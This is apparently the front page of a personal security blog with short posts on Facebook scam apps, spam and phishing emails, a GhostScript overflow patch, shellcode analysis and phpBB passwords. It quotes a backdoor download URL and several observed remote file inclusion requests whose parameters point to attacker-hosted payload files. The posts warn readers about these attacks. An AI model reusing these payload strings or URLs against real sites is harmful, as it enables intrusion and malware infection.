secgeeks's blog

I use facebook to connect with my friends. few days back i received an applciation invite named "10 lies girls tell guys.." from a friend of mine. since it was from a trusted person and titile is catchy,i decided to try this app.
but to my surpirse, when i opned the application it gives and window with instruction like : press ctrl + c then press alt+d then press ctrl +v after that press enter.  read more »

Spammers has now started using google feed proxy link to avoid detection.today i recived following email:

as you can see it uses following link:
http://feedproxy.google.com/~r/juy7/~3/cy83akSysSk
its just a 301 redirect:

and the end result is following:

lets see what will be the next!!

Secgeeks.com is back after having lots of downtime. we are receiving lots of traffic(means we are improving) so we are facing downtime with our hosts. hopefully we will manage it now!!

Some of you know him while some of you don't know. For some it is a news and for some it is not. +Favia was an outstanding reverse engineer,who has inspired many people in Reverse Engineering.He passed away in may at the age of 56.
it is a sad news.
Rest in Peace, +Fravia. You won’t be forgotten.

Seems that people are using Michael Jackson's name to spread the malwares. i have receveied this mail:

this mail has a link : www.facebook.com which actually points to:
hzzp://210.188.255.10/~yamazaki/MichaelJackson.jpg.exe

which is a backdoor. see the full report here.

I have received this mail today:
"Dear windows User,

Following a recent outbreak of the conflicker worm also known as downadup or trojan/brisv.a affecting over 15million Microsoft Windows users.. Merely
visiting a lot of popular sites could have gotten you infected. The virus exploited a vulnerability in all windows versions and products including the windows xp and vista operating systems. Researchers at Microsoft have
been working closely with Symantec, the creators of Norton antivirus and have come up with a removal tool for the conflicker virus. The average anti-virus  read more »

So after adobe,its in GhostScript.There is a patch as follows:
699 if (exrunlength > params->SDNUMEXSYMS - j)

here the vulnerable parameter is exrunlength,if its large then there is a overflow.
read more here.

Often in some exploit analysis we need to analyze the shellcode,what it does and how.There are many ways you can do it.but the most simple way is to use following link:
http://sandsprite.com/shellcode_2_exe.php
Just copy paste your shellcode and it will give you a exe containing shellcode.then you can simply run it in ollydebugger and step in. sometimes shellcode is encrypted using the XOR but that is very simple to decode.
Hope it helps ..

Cheers,
SecGeek

I was reading this story
from the article:
"The BBC has deliberately hacked into 22,000 PCs to prove the power of botnets, and the damage that can be done with a network of compromised computers.

Click – BBC News’ technology programme – with the help of anti-virus company Prevx, took over thousands of computers in order to demonstrate a growing problem in the modern world.  read more »

I received this mail:

Subject of mail is catchy and anyone can get diverted to it.at a first look url also seems to be coming from facebook but in fact it is not.
look at the highlighted url.thats the original url.so beware of it.

If you work with packets,network protocols then i am sure you have lots of problem in modifying them.currently there are limited number of tools which allows to edit the packets.today i was playing with pcapr and i found it awesome.it has all the features which are required.you can upload packets,browse other dumps,modify dumps and download them.good thing for your toolbox.you can access it here.

I was reading this article at darknet .it provides a analysis of the PHPBB user password.It means what kind of password general users keeps.The analysis has some strange result stating that most of the password are very common and you can easily find them online here.
I have not used PHPBB much and i dont remember if it forces a miminal password lenght or complexity.  read more »

In penetration testing often we need a tool which can scan the network and identify the vulnerability,here is one of them called metascanner.you can download it from here.

I come to know about it today from fulldiscloser list.you can download it here.

Strange,every site i m searching right now on google is coming with a message this site may harm your computer in search result.see bellow:

is it i m alone or other are also facing this problems?

Previously i posted an article on secgeeks.com regarding remote file include vulnerabilities,i am constantly seeing and increase in such requests . following url contains so called malicious files(adding them with request file):
secure.php?cfgProgDir=http://www.kmt-s.ru/chid.txt???

//sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=http://203.114.112.155/webboard1234/1.jpg?

minibb/index.php?absolute_path=http://www.beautifulchurch.org/images/main/main.js

cyberfolio/portfolio/msg/view.php?av=http://www.sacot-dz.com/webmail/logs/log.txt????  read more »

I was surfing some new site and i got this link. Its basically a javascript code which automatically fills the CAPTCHA of megaupload.com and start the download.looks intresting?
Guess next will be for breaking CAPTCHA of other sites like google,yahoo etc?

Axon has posted a nice thing here regarding what geeks expect in a job. from the article:
" For the love of all things good in the world, learn how to hire and employ a geek. You're doing it wrong.

Office Politics
Try to measure productivity in output, not in hours.  read more »

check this image,people started using nokia to spam others...

from sans diary here:
"One of our readers submitted this log entry, which shows a typical SQL injection exploit. The "new" part is that the javascript injected in this case is trying to exploit the MSIE 0-day:

In this case, the SQL injection is delivered as a cookie, not a GET parameter.

I broke up the strings for readability and inserted spaces around the malicious URL. As usual with these kinds of exploit, the script will load another script which will load another script ultimatley leading to the IE exploit."  read more »